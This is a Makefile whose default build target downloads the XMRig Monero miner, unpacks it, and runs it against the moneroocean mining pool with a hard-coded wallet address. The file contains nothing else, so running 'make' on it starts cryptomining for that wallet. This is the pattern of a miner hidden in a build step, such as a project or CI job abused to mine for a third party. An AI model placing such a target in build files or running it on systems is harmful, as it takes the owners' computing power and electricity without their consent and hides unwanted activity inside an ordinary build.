all:
	wget https://github.com/xmrig/xmrig/releases/download/v2.6.3/xmrig-2.6.3-xenial-amd64.tar.gz
	tar -xzf xmrig-2.6.3-xenial-amd64.tar.gz
	xmrig-2.6.3/xmrig --no-color -o gulf.moneroocean.stream:80 -u 44iGHthRoegQckvM9wbNCmU7ibE5PamMGGfQV4Gd4BbZHtbPNNsAK2bTcHLgecU7soZKujCT16KRrZZr7dsMEnjBV1tHFM4
